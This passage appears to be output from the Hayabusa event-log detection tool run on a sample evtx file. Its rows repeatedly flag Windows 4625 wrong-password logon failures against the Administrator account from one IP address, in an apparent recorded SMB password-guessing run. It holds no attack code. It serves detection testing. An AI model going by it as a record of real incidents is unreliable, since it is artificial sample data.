NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yxne9LqZCqBf3qkc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ssZya6gArnuepKyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rsDEj6o0NaKUYPZL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pELSIsupIYAxPCtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: urHCDmdCfNexxUHf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czGXZFukLquA9Mce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: icWMY9pKCQMyTxJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v28FLC2WXEXSUiI5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FwhjHww5iA51SFjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 96BwmhKqDIojhdRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DiRvofjwoeAdHYrv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BNLdOrPwbvYELiCc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x15WKTspmg2ALHaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QMoQWddkcYtCmoKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jhTbfX42Pwn7OA2k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXcbUCgAhVFfqLc3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GHyXVM0jpaKBiY9N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TZoWEcU6VbEnrLpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LIfEzNQWwvrai4ga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DhImfqWz7SHId9hE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6sekQfneNE5uFtx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iEQ6KkZEHGcSgdA8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qzxJYBbM7ZMaaGOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wO5GFBqSltNfjtQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PdsMzjfP1ZcPju2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LqpKmoCX9slPXie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ouHvw1LXTN3OSFYb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tZIB1QO7hfugceJg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4QU2BQ0u5tJsdjG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0P7NKiKCmLvu6L1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4obkK4RfsLZe5gdi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRUDpDLhgop8d1el : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LvdsNkFqfFWRePXJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wvd8c1jYrEZMcKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AWvECxgkvWdg9Zdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lHHPOAYSMSp3BhX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rJicXUMfrx9BOzHI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eybrQWvrvwSkNADJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VVMPCaQB0XteDSwC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lbjjLoATZE6KPIQv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tips954DRcYeIB2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nLe9aMiMz0akxfWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: csroGB9KZOZkb5sY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Zl4Rc25RsvJ7Y9H : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C5CxqCFOIJBMZCD6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gVPwxpR05F3B5aXp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nP317UkK2DhTD5Rd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ir3c7dqXm1LhbfqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1U1QZiJSrEufxF3b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HZnDnDhTPuC9n5A1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72gY1ClzwuisAhKW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nrneLGOZCwPIeQgT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm3gGV2yR4B3yrJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fzeklLG1KCTE5FpP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZPwxCw3EWy9NShk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MalB3OcsOsRaMtS3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XMZMqCYPHO3n4RIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1VUeIuU1rQPISNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: 